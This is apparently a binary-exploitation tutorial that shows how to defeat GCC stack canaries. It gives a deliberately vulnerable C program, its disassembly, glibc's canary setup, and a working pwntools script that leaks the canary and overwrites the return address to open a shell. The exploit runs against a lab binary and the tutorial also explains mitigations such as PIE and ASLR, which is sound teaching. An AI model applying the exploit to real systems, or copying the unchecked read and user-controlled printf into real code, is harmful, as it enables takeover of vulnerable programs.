Stack Canaries

Sidestepping a buffer overflow mitigation to gain control of execution

Intro

Lately I've been exploring binary exploitation techniques. To get my feet wet, I decided to tackle the buffer overflow, perhaps the most well-known exploit in software security.

The idea is as follows: if we are reading data into a stack variable, and the length of this data exceeds the size of the variable, we can write past the variable and overwrite other stuff on the stack.

Why does this matter? Well, if we keep writing data, overflowing the buffer, eventually we'll encounter the return address, which was placed on the stack from a previous call instruction. If we can overwrite this return address with an address of our choosing, we can gain control over the execution of the program.

Of course, this exploit requires that the application software is poorly written from a security perspective, and does not perform any length checking of the input data against the size of the buffer.

The Stack

The stack canary lives between the local variables and the return address. The calling function is responsible for pushing the return address onto the stack, while the callee pushes the previous frame pointer, as well as any caller preserved registers and padding required for proper stack alignment. The exact number of bytes between the return address and the stack canary will vary depending on architecture and compiler options.

The compiler will insert the canary between the local variables and the return address in order to protect the return address from corruption in case of an accidental overflow. The compiler will also insert logic into the binary that verifies the canary value hasn't changed before returning.

Let's get started with an example.

defeat_canary.c

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>

void shell() {
	system("/bin/sh");
}

void vulnerable_fn() {
	char buf[100];

	read(STDIN_FILENO, buf, 200); 
	printf(buf);
}

int main() {
	setbuf(stdin, NULL); 
	setbuf(stdout, NULL);

	printf("Hello World! A buffer overflow opportunity is waiting to be exploited.");
	printf("Input: ");
	vulnerable_fn();
}

Here we have a stack smashing opportunity: we are reading 200 bytes from stdin, the size of buf is only 100 bytes, and we are not doing any length checking of our input.

Compile defeat_canary.c for 32-bit and without position independence. 32-bit is chosen for convenience; later I will talk about why position independent executables make it more difficult to perform this exploit.

gcc -m32 -no-pie defeat_canary.c -o defeat_canary

By reading more data from stdin into buf than its size, we can see the stack protection features of GCC in action (here I am inputting 200 bytes).

$ ./defeat_canary
Hello World! A buffer overflow opportunity is waiting to be exploited.
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtB!��
*** stack smashing detected ***: terminated
Aborted (core dumped)

If we input too much data from stdin, we will trigger __stack_chk_fail(), which terminates the program in case of stack overflow. __stack_chk_fail() is a function from libc that is injected into the binary by GCC during compilation.

Alas, since we corrupted the stack canary by overflowing buf, we get kicked out. With a little more knowledge, we can get away with our buffer overflow attack by tricking the program into thinking everything's okay.

Analyzing the Disassembly

In the disassembly for vulnerable_fn(), we see that soon after function entry, the stack canary is placed on the stack at $ebp-0xc. Without diving too deeply into segment registers and the Global Descriptor Table (GDT), the stack canary is getting loaded at a 0x14 byte offset from $gs_base, which is pointing at the current thread's Thread Local Storage (TLS). This is because glibc maintains stack canaries on a per thread-basis; that is, each thread has a different stack canary value (see glibc/sysdeps/i386/nptl/tls.h if you're curious).

Then $eax is cleared by an XOR with itself--I believe this is to mitigate any leakage of the canary through $eax that could happen later on.

080491f1 <vulnerable_fn>:
 ...
 8049203:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax
 8049209:	89 45 f4             	mov    %eax,-0xc(%ebp)
 804920c:	31 c0                	xor    %eax,%eax
 ...

Later, we can see that before returning from vulnerable_fn(), the stack canary gets checked. If it does not equal the four bytes at $gs:0x14, we end up in __stack_chk_fail_local() (a glibc alias for __stack_chk_fail()).

080491f1 <vulnerable_fn>:
...
8049234:	8b 45 f4             	mov    -0xc(%ebp),%eax
8049237:	65 2b 05 14 00 00 00 	sub    %gs:0x14,%eax
804923e:	74 05                	je     8049245 <vulnerable_fn+0x54>
8049240:	e8 8b 00 00 00       	call   80492d0 <__stack_chk_fail_local>
...

So, how do we get around this? We want to write past buf and overwrite the return address, but the stack canary is getting in our way. Sad times.

But do not fret! If we craft our input wisely, we can overflow the buffer in such a way that we can overwrite the return address AND preserve the stack canary value. Win-Win. Of course, this requires that we know the stack canary value before we craft our input.

Maybe glibc can tell us how the stack canary is borne into our program's memory.

Initializing the Canary

// glibc/csu/libc-start.c
STATIC int LIBC_START_MAIN (...)
{
...
  /* Set up the stack checker's canary.  */
  uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
# ifdef THREAD_SET_STACK_GUARD
  THREAD_SET_STACK_GUARD (stack_chk_guard);
# else
  __stack_chk_guard = stack_chk_guard;
# endif
...
}

// glibc/sysdeps/unix/sysv/linux/dl-osinfo.h
static inline uintptr_t __attribute__ ((always_inline))
_dl_setup_stack_chk_guard (void *dl_random)
{
  union
  {
    uintptr_t num;
    unsigned char bytes[sizeof (uintptr_t)];
  } ret;

  /* We need in the moment only 8 bytes on 32-bit platforms and 16
     bytes on 64-bit platforms.  Therefore we can use the data
     directly and not use the kernel-provided data to seed a PRNG.  */
  memcpy (ret.bytes, dl_random, sizeof (ret));
#if BYTE_ORDER == LITTLE_ENDIAN
  ret.num &= ~(uintptr_t) 0xff;
#elif BYTE_ORDER == BIG_ENDIAN
  ret.num &= ~((uintptr_t) 0xff << (8 * (sizeof (ret) - 1)));
#else
# error "BYTE_ORDER unknown"
#endif
  return ret.num;
}

Looking at this snippet from glibc, we can see some of the calls that help to setup the canary. It turns out that _dl_random is a random value generated by the kernel's binary loader and passed up to user space via the auxiliary vector, which is a container of information about the OS environment that the kernel gives to user space programs on entry.

It also should be noted that the last byte of the canary is cleared to 0x00. This is to ensure that the local variable nearest to the canary is null-terminated so as not to leak memory from the rest of the stack. This tidbit is crucial and will come into play very soon.

So, the canary is a random number generated for each thread at runtime. How can we know the canary value in advance? And without having debug access?

Leaking the Canary

For the purposes of this demonstration, we're going to add some code to vulnerable_fn() which will allow us to leak the canary so that we can use it to construct the input that will give us control over the execution.

It's just an extra call to read(). The first read() will allow us to leak the canary; the second will allow us to perform our exploit successfully.

// defeat_canary.c
...
void vulnerable_fn() {
	char buf[100];
	for (int i = 0; i < 2; ++i) {
		read(STDIN_FILENO, buf, 200); 
		printf(buf);
	}
}
...

We will use a Python script that leverages pwntools to perform I/O with the application, as inputting hundreds of bytes manually is (a bit) tedious.

defeat_canary.py

#!/usr/bin/env python
from pwn import *
import os
import time

context.binary = 'defeat_canary'
io = process ('./defeat_canary')
elf = ELF('./defeat_canary')
shellfn = elf.sym["shell"]

io.recvuntil(b'Input: ')

payload = b'A' * 100
io.sendline(payload) # Adds a line feed character (0xa) in addition to payload
io.recvuntil (b'A' * 100)

Canary = u32(io.recv(4)) - 0xa 
log.info("Canary:" + hex(Canary))

payload = (b'\x90' * 100) + p32(Canary) + (b'\x90' * 12) + p32(shellfn)
io.send(payload)
io.recv()
io.interactive()

The first payload we send really contains 101 bytes: 100 'A's and 1 line feed character. This line feed character is critical; it overwrites the first byte of the canary, which means our buf is no longer null-terminated. This means our call to printf() can help us leak the remaining three bytes of the canary (and possibly more;printf() will continue writing to stdout until it reaches a null-terminator).

Reading in another 4 bytes after our known initial payload will give us the canary value plus an extra 0xa for the line feed character that gets appended as a result of io.sendline(). Subtracting this 0xa gives us the true canary value.

We saw earlier that our canary value was placed on the stack at the location $ebp-0xc. So, if we know that our return address is located at $ebp+0x4, we know we have to write an extra 0xc bytes of padding to reach our return address.

The final payload is then composed of:

100 bytes to fill up buf
The canary value we leaked earlier
12 bytes of padding
The address of shell(), which, when vulnerable_fn() returns, will grant us shell access

Running this script, we are able to achieve control of execution and thus gain shell access:

$ python defeat_canary.py
[*] '~/defeat_canary'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Starting local process './defeat_canary': pid 145887
[*] Canary:0xf78b8700
[*] Switching to interactive mode
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90$ 
$ whoami
matt

Conclusion

As you can see, the stack canary is a form of binary protection that can be fairly easily bypassed without additional protections such as ASLR and PIE. Maintaining the legitimacy of the stack is a key aspect of software security, as proper control flow requires that the contents of the stack (especially return addresses) cannot be corrupted by malicious or otherwise negligent means.

Notes

Why doesn't this work without the "-no-pie" compiler option?

The location of position independent code is decided by the dynamic linker at load time. Typically this is combined with Address Space Layout Randomization (ASLR) so that a random base address is decided for the executable and its dependencies every time they are loaded into memory.

This makes it harder to gain execution control from a buffer overflow because we are unable to know the runtime address of our shell() function (or any function we intend to direct execution to), so we wouldn't be able to know how exactly to craft our exploitive payload.

In fact, we can compile defeat_canary.c without -no-pie and see that the address for shell() in the ELF file is just an offset.

$ gcc -m32 defeat_canary.c -o defeat_canary
$ readelf -s defeat_canary | grep vulnerable_fn
    28: 00001218   108 FUNC    GLOBAL DEFAULT   14 vulnerable_fn

fstack-protector

fstack-protector is one of the instrumentation features GCC offers. From the GCC docs:

-fstack-protector

Emit extra code to check for buffer overflows, such as stack smashing attacks. 
This is done by adding a guard variable to functions with vulnerable objects. This 
includes functions that call alloca, and functions with buffers larger than or equal 
to 8 bytes. The guards are initialized when a function is entered and then checked 
when the function exits. If a guard check fails, an error message is printed and 
the program exits. Only variables that are actually allocated on the stack are 
considered, optimized away variables or variables allocated in registers don’t count.

Depending on your Linux distribution, GCC may have been patched to enable this by default. This is what tells GCC to instrument your binary to add the stack canary and the checking logic from glibc.

References

Stack buffer overflowWikipedia

Common Mistakes in Basic Stack Buffer OverflowMedium

Canary - CTF Wiki ENctf-wiki.mahaloz.re

CC-BY-NC-SA 4.0

PreviousBinary Exploitation and Reverse Engineering

Last updated 1 year ago

Was this helpful?